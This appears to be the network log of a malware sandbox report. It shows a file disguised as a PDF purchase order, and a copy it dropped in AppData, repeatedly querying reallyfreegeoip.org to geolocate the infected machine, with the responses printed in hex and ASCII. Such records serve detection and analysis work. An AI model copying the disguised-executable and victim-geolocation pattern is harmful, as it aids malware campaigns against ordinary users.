                                                                                2024-10-25 07:17:16 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.849721188.114.97.34432788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:16 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                2024-10-25 07:17:17 UTC898INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:16 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 312
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BepxfvEMvxzv7oqPJGB3PBy0DyCOeCJz%2BFJ41x%2BHXjYd%2FXLGOsWd06bnE4z9KA%2BMbtZvn9%2FplmHCSxoVmh9RZMOJWlNYQFh2A9%2B4mRt0LVItheRsQdksE3KkFnh4oPLvVgMWCiUP"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d0ce9c76c25-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1861&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1498964&cwnd=251&unsent_bytes=0&cid=acfae2698219fa41&ts=143&x=0"
                                                                                2024-10-25 07:17:17 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.849724188.114.97.34434568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:18 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-25 07:17:18 UTC898INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:18 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 314
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4RZoc7dhyuGKHkC%2F%2BdUM%2BfW7YE9wKYM5BcboUjSf6AR3ulvwE4qbD8xDOAGq%2FIe1lfAGL4HZEN4MPyyWtYLOSmfVc8TvRt%2BAFTYLfZznLhSRi1ZV%2BvmgfrwnFlTVyNJVEyovEBHM"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d14f88a6b17-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1050&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2758095&cwnd=250&unsent_bytes=0&cid=2b7c43188408270c&ts=148&x=0"
                                                                                2024-10-25 07:17:18 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.849725188.114.97.34432788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:18 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-25 07:17:18 UTC896INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:18 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 314
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4piYN5J9YLwjDzJFO3JTxl6%2Fs%2Fs2XM3xJc3BsJL44COz8rVWpEUO9LkSXGPCrMP9wnv7v8fzi5nl8x%2FVKpC9Kou41pzi%2BQo8mg32C%2BIl4XdGeYyikYoWnmbI5hHFnh6ROVuSqqHe"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d174c7b3aac-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1170&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2331723&cwnd=245&unsent_bytes=0&cid=8c1a73b88c3ea3cb&ts=161&x=0"
                                                                                2024-10-25 07:17:18 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.849729188.114.97.34432788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:20 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-25 07:17:20 UTC894INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:20 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 316
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9xZQfhFwAF1yIxU%2F1GezVlpH82a7dF8hD1HM5IhO1ZZ9A7RaDWzlczjuKsz4qixSXBsw%2BssBHRXmCXm0I4SsdpKN7m5bQCpD3A%2F8J3mEAvtlhIrL1YPGONId9W3fse%2FbtjAteUAi"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d24cd8f6b89-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1951&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1471544&cwnd=251&unsent_bytes=0&cid=e32fc79699601d3f&ts=665&x=0"
                                                                                2024-10-25 07:17:20 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.849728188.114.97.34434568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:20 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                2024-10-25 07:17:20 UTC895INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:20 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 316
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tv3xdVj5ocna8aoH435DgkPDzfLJJT7rAdc7TbqiRfPOHDvYnbl%2BkIfa2FIxqaqxlCoDZC%2BkUS5qksuqX5ibgTfZUIoF2livEnukouE6g4vJe%2BUgA4hdTXLQU93sEKqMS%2FFoCMny"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d24cca6e702-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1333&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2127847&cwnd=251&unsent_bytes=0&cid=2f21e09c63582be2&ts=1051&x=0"
                                                                                2024-10-25 07:17:20 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.849733188.114.97.34434568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:22 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-25 07:17:22 UTC899INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:22 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 318
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DHYnJk655cpow8i%2FAYJbG3vF8unGuHyeW4J6MSNzBnZQppObq19t47k7jerdKu%2FV1esI%2F%2BC1%2BGSYTSYpde%2B6Cf7M4HD%2BNIGPTpUSfATtZLsWpNSSOWW1SgGNICnuSmqcOBRrXAbF"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d2f5eac4648-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1163&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2468883&cwnd=32&unsent_bytes=0&cid=881db09a2d9d3de9&ts=146&x=0"
                                                                                2024-10-25 07:17:22 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.849732188.114.97.34432788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:22 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-25 07:17:22 UTC896INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:22 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 318
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nq5Fh0CGEqNOPbaO45WBLzuMr%2FtiAXxg4jOqd0GeXiSEwzT4LLfppMQLoFhafOE69U8%2F%2BhUb2ydrKkzDOjoy2CCcKE9758SStSzjDxnH%2FDQrEfrWTs9wB9n7%2BPNn201kVuGbucln"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d2f6a7a2c96-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1284&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2170914&cwnd=249&unsent_bytes=0&cid=3dc4f6d08f459b8d&ts=153&x=0"
                                                                                2024-10-25 07:17:22 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.849736188.114.97.34432788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:24 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                2024-10-25 07:17:24 UTC892INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:24 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 320
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uw8oxhkTqQQ%2B8XJuw83jVRsMS1%2BACK6MZG9XmWYSUDtCpwUO35UnL8m0mMFLM8ycYzGm3NFEZEON0CigrSXvUQlukLCVHUYNVEDkB3D1zkJQJ3RXAf4I%2FDHNgUA4hZsusZKvMeCB"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d39db49e51c-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1178&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2399337&cwnd=249&unsent_bytes=0&cid=28886638a5559c51&ts=149&x=0"
                                                                                2024-10-25 07:17:24 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.849738188.114.97.34434568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:24 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                2024-10-25 07:17:24 UTC900INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:24 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 320
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
